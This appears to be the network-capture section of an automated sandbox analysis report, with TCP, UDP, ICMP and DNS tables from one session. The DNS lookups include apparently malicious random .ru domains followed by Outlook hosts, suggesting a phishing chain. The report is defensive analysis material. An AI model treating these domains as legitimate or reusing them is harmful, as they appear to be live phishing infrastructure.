                                                                                                        Dec 18, 2024 23:17:18.707037926 CET49790443192.168.2.440.99.70.226
                                                                                                        Dec 18, 2024 23:17:18.850250006 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:18.850275993 CET4434979240.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:18.850341082 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:18.850527048 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:18.850541115 CET4434979240.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:19.371587038 CET44349791104.21.18.132192.168.2.4
                                                                                                        Dec 18, 2024 23:17:19.371853113 CET44349791104.21.18.132192.168.2.4
                                                                                                        Dec 18, 2024 23:17:19.371957064 CET49791443192.168.2.4104.21.18.132
                                                                                                        Dec 18, 2024 23:17:19.372648954 CET49791443192.168.2.4104.21.18.132
                                                                                                        Dec 18, 2024 23:17:19.372674942 CET44349791104.21.18.132192.168.2.4
                                                                                                        Dec 18, 2024 23:17:20.941497087 CET4434979240.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:20.941740036 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:20.941761971 CET4434979240.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:20.943604946 CET4434979240.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:20.943684101 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:20.943707943 CET4434979240.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:20.943761110 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:20.944749117 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:20.944834948 CET4434979240.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:20.945022106 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:20.945038080 CET4434979240.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:20.995790005 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:21.622735023 CET4434979240.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:21.622929096 CET4434979240.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:21.623102903 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:21.623195887 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:21.623219013 CET4434979240.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:21.623228073 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:21.623271942 CET49792443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:21.624977112 CET49793443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:21.625024080 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:21.625107050 CET49793443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:21.625339985 CET49793443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:21.625359058 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:23.703171968 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:23.703497887 CET49793443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:23.703525066 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:23.704010963 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:23.704299927 CET49793443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:23.704377890 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:23.704422951 CET49793443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:23.744534016 CET49793443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:23.744546890 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:24.391453028 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:24.391525030 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:24.391680002 CET49793443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:24.391705036 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:24.392031908 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:24.392469883 CET49793443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:24.392477989 CET4434979340.99.32.114192.168.2.4
                                                                                                        Dec 18, 2024 23:17:24.392505884 CET49793443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:24.392529964 CET49793443192.168.2.440.99.32.114
                                                                                                        Dec 18, 2024 23:17:42.955673933 CET49829443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:17:42.955780983 CET44349829142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:17:42.955902100 CET49829443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:17:42.956207037 CET49829443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:17:42.956237078 CET44349829142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:17:44.657047033 CET44349829142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:17:44.657383919 CET49829443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:17:44.657450914 CET44349829142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:17:44.657752037 CET44349829142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:17:44.658047915 CET49829443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:17:44.658114910 CET44349829142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:17:44.668428898 CET4972480192.168.2.4199.232.210.172
                                                                                                        Dec 18, 2024 23:17:44.714147091 CET49829443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:17:44.788558006 CET8049724199.232.210.172192.168.2.4
                                                                                                        Dec 18, 2024 23:17:44.788677931 CET4972480192.168.2.4199.232.210.172
                                                                                                        Dec 18, 2024 23:17:54.368244886 CET44349829142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:17:54.368395090 CET44349829142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:17:54.368510008 CET49829443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:17:54.934514046 CET49829443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:17:54.934571028 CET44349829142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:18:03.260848045 CET49789443192.168.2.440.99.70.226
                                                                                                        Dec 18, 2024 23:18:03.260881901 CET4434978940.99.70.226192.168.2.4
                                                                                                        Dec 18, 2024 23:18:18.918973923 CET49789443192.168.2.440.99.70.226
                                                                                                        Dec 18, 2024 23:18:18.919136047 CET4434978940.99.70.226192.168.2.4
                                                                                                        Dec 18, 2024 23:18:18.919229031 CET49789443192.168.2.440.99.70.226
                                                                                                        Dec 18, 2024 23:18:43.011398077 CET49971443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:18:43.011493921 CET44349971142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:18:43.011595964 CET49971443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:18:43.011872053 CET49971443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:18:43.011908054 CET44349971142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:18:44.710207939 CET44349971142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:18:44.710546970 CET49971443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:18:44.710592985 CET44349971142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:18:44.711442947 CET44349971142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:18:44.711729050 CET49971443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:18:44.711827040 CET44349971142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:18:44.761379957 CET49971443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:18:54.406142950 CET44349971142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:18:54.406224012 CET44349971142.250.181.132192.168.2.4
                                                                                                        Dec 18, 2024 23:18:54.406292915 CET49971443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:18:54.918915033 CET49971443192.168.2.4142.250.181.132
                                                                                                        Dec 18, 2024 23:18:54.918956041 CET44349971142.250.181.132192.168.2.4
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 18, 2024 23:16:38.707999945 CET5911053192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:38.708205938 CET6035553192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:38.736865997 CET53505601.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:38.741954088 CET53515151.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:39.084686995 CET53591101.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:39.085136890 CET53603551.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.796961069 CET6175653192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:40.797483921 CET5952553192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:40.802964926 CET5681953192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:40.803345919 CET5864953192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:40.936217070 CET53617561.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.939884901 CET53595251.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.942915916 CET53586491.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:40.943145990 CET53568191.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:41.459232092 CET53558151.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:42.892354965 CET6339753192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:42.892482996 CET5690053192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:42.896115065 CET5823953192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:42.896269083 CET5799453192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:42.996543884 CET6331853192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:42.996690035 CET6030353192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:43.031418085 CET53569001.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:43.031929016 CET53633971.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:43.035633087 CET53582391.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:43.035644054 CET53579941.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:43.368031979 CET53633181.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:43.368437052 CET53603031.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:46.785598040 CET5912153192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:46.785708904 CET6166153192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:46.786128998 CET5376853192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:46.786263943 CET5068453192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:46.786545038 CET5994853192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:46.786658049 CET5924553192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:46.924515963 CET53616611.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:46.924660921 CET53591211.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:46.925228119 CET53506841.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:46.925239086 CET53537681.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:46.925720930 CET53599481.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:46.928615093 CET53592451.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:49.014451027 CET6097653192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:49.014612913 CET5128153192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:49.153464079 CET53609761.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:49.153511047 CET53512811.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:50.951458931 CET53621591.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.162369013 CET5714853192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:51.164891958 CET5150753192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:51.198590040 CET4974653192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:51.198590040 CET5254553192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:51.304066896 CET53571481.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.304083109 CET53515071.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.337707996 CET53497461.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:51.339870930 CET53525451.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.638406992 CET6441353192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:55.638571024 CET5802753192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:16:55.777962923 CET53644131.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:55.780662060 CET53580271.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:16:56.273947001 CET138138192.168.2.4192.168.2.255
                                                                                                        Dec 18, 2024 23:16:58.406572104 CET53499411.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:17:11.968378067 CET5889253192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:11.968488932 CET6124253192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:12.456027985 CET53588921.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:17:12.456489086 CET53612421.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:17:15.872140884 CET6266053192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:15.872265100 CET5400353192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:15.881040096 CET5960553192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:15.881154060 CET5928853192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:16.023613930 CET53596051.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:17:16.024988890 CET53592881.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:17:16.027050018 CET53626601.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:17:16.284852028 CET53540031.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:17:17.416790962 CET53527991.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:17:18.708916903 CET6283753192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:18.709021091 CET6233353192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:18.849680901 CET53623331.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:17:18.849719048 CET53628371.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:17:27.195363045 CET6365453192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:27.195466995 CET5529753192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:27.197540998 CET6165953192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:27.197660923 CET6404553192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:30.088418007 CET5831853192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:30.088545084 CET6113653192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:31.114064932 CET5225253192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:31.114250898 CET5639953192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:33.815180063 CET6300153192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:33.815299034 CET6465953192.168.2.41.1.1.1
                                                                                                        Dec 18, 2024 23:17:38.269716978 CET53604671.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:17:40.387150049 CET53629191.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:18:10.249212980 CET53578031.1.1.1192.168.2.4
                                                                                                        Dec 18, 2024 23:18:55.682601929 CET53545991.1.1.1192.168.2.4
                                                                                                        TimestampSource IPDest IPChecksumCodeType
                                                                                                        Dec 18, 2024 23:16:38.837378025 CET192.168.2.41.1.1.1c233(Port unreachable)Destination Unreachable
                                                                                                        Dec 18, 2024 23:17:16.285095930 CET192.168.2.41.1.1.1c279(Port unreachable)Destination Unreachable
                                                                                                        Dec 18, 2024 23:17:27.665262938 CET192.168.2.41.1.1.1c2a1(Port unreachable)Destination Unreachable
                                                                                                        Dec 18, 2024 23:17:30.603305101 CET192.168.2.41.1.1.1c241(Port unreachable)Destination Unreachable
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Dec 18, 2024 23:16:38.707999945 CET192.168.2.41.1.1.10x94c8Standard query (0)paterbrothers.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:38.708205938 CET192.168.2.41.1.1.10x1a6dStandard query (0)paterbrothers.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:40.796961069 CET192.168.2.41.1.1.10xc885Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:40.797483921 CET192.168.2.41.1.1.10x950Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:40.802964926 CET192.168.2.41.1.1.10x146Standard query (0)paterbrothers.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:40.803345919 CET192.168.2.41.1.1.10xf9d8Standard query (0)paterbrothers.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:42.892354965 CET192.168.2.41.1.1.10x142dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:42.892482996 CET192.168.2.41.1.1.10xb80Standard query (0)www.google.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:42.896115065 CET192.168.2.41.1.1.10xf111Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:42.896269083 CET192.168.2.41.1.1.10x9babStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:42.996543884 CET192.168.2.41.1.1.10x57b2Standard query (0)d7m.kczcylvjubu.ruA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:42.996690035 CET192.168.2.41.1.1.10x55baStandard query (0)d7m.kczcylvjubu.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.785598040 CET192.168.2.41.1.1.10xba8cStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.785708904 CET192.168.2.41.1.1.10x4ea4Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.786128998 CET192.168.2.41.1.1.10x493bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.786263943 CET192.168.2.41.1.1.10x524Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.786545038 CET192.168.2.41.1.1.10x83bcStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.786658049 CET192.168.2.41.1.1.10xdcf1Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:49.014451027 CET192.168.2.41.1.1.10x1497Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:49.014612913 CET192.168.2.41.1.1.10x79a7Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:51.162369013 CET192.168.2.41.1.1.10x2ba2Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:51.164891958 CET192.168.2.41.1.1.10x36a4Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:51.198590040 CET192.168.2.41.1.1.10x2ef2Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:51.198590040 CET192.168.2.41.1.1.10x7530Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:55.638406992 CET192.168.2.41.1.1.10x3844Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:55.638571024 CET192.168.2.41.1.1.10xcb83Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:11.968378067 CET192.168.2.41.1.1.10x6edcStandard query (0)yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ruA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:11.968488932 CET192.168.2.41.1.1.10xba1fStandard query (0)yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:15.872140884 CET192.168.2.41.1.1.10x3cd9Standard query (0)www.outlook.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:15.872265100 CET192.168.2.41.1.1.10x88acStandard query (0)www.outlook.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:15.881040096 CET192.168.2.41.1.1.10x5fd6Standard query (0)yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ruA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:15.881154060 CET192.168.2.41.1.1.10xcb8Standard query (0)yxsicvivg3tcc8edzvkpxgggf99tcczt03g9ruo9nniufbnqvah0oovv.uyofiykrxf.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.708916903 CET192.168.2.41.1.1.10x743aStandard query (0)outlook.live.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:18.709021091 CET192.168.2.41.1.1.10xd2c2Standard query (0)outlook.live.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:27.195363045 CET192.168.2.41.1.1.10xdca5Standard query (0)assets.onestore.msA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:27.195466995 CET192.168.2.41.1.1.10x25efStandard query (0)assets.onestore.ms65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:27.197540998 CET192.168.2.41.1.1.10xfa49Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:27.197660923 CET192.168.2.41.1.1.10x1bbStandard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:30.088418007 CET192.168.2.41.1.1.10x80abStandard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:30.088545084 CET192.168.2.41.1.1.10x380eStandard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:31.114064932 CET192.168.2.41.1.1.10x9468Standard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:31.114250898 CET192.168.2.41.1.1.10x7fc6Standard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:33.815180063 CET192.168.2.41.1.1.10xda09Standard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:17:33.815299034 CET192.168.2.41.1.1.10x609fStandard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Dec 18, 2024 23:16:39.084686995 CET1.1.1.1192.168.2.40x94c8No error (0)paterbrothers.com69.49.245.172A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:40.936217070 CET1.1.1.1192.168.2.40xc885No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:40.936217070 CET1.1.1.1192.168.2.40xc885No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:40.939884901 CET1.1.1.1192.168.2.40x950No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:40.943145990 CET1.1.1.1192.168.2.40x146No error (0)paterbrothers.com69.49.245.172A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:43.031418085 CET1.1.1.1192.168.2.40xb80No error (0)www.google.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:43.031929016 CET1.1.1.1192.168.2.40x142dNo error (0)www.google.com142.250.181.132A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:43.035633087 CET1.1.1.1192.168.2.40xf111No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:43.035633087 CET1.1.1.1192.168.2.40xf111No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:43.035644054 CET1.1.1.1192.168.2.40x9babNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:43.368031979 CET1.1.1.1192.168.2.40x57b2No error (0)d7m.kczcylvjubu.ru104.21.78.181A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:43.368031979 CET1.1.1.1192.168.2.40x57b2No error (0)d7m.kczcylvjubu.ru172.67.168.82A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:43.368437052 CET1.1.1.1192.168.2.40x55baNo error (0)d7m.kczcylvjubu.ru65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.924660921 CET1.1.1.1192.168.2.40xba8cNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.924660921 CET1.1.1.1192.168.2.40xba8cNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.924660921 CET1.1.1.1192.168.2.40xba8cNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.924660921 CET1.1.1.1192.168.2.40xba8cNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.925228119 CET1.1.1.1192.168.2.40x524No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.925239086 CET1.1.1.1192.168.2.40x493bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.925239086 CET1.1.1.1192.168.2.40x493bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.925720930 CET1.1.1.1192.168.2.40x83bcNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.925720930 CET1.1.1.1192.168.2.40x83bcNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:46.928615093 CET1.1.1.1192.168.2.40xdcf1No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:49.153464079 CET1.1.1.1192.168.2.40x1497No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:49.153464079 CET1.1.1.1192.168.2.40x1497No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:49.153464079 CET1.1.1.1192.168.2.40x1497No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:49.153464079 CET1.1.1.1192.168.2.40x1497No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:51.304066896 CET1.1.1.1192.168.2.40x2ba2No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:51.304066896 CET1.1.1.1192.168.2.40x2ba2No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Dec 18, 2024 23:16:51.304083109 CET1.1.1.1192.168.2.40x36a4No error (0)challenges.cloudflare.com65IN (0x0001)false
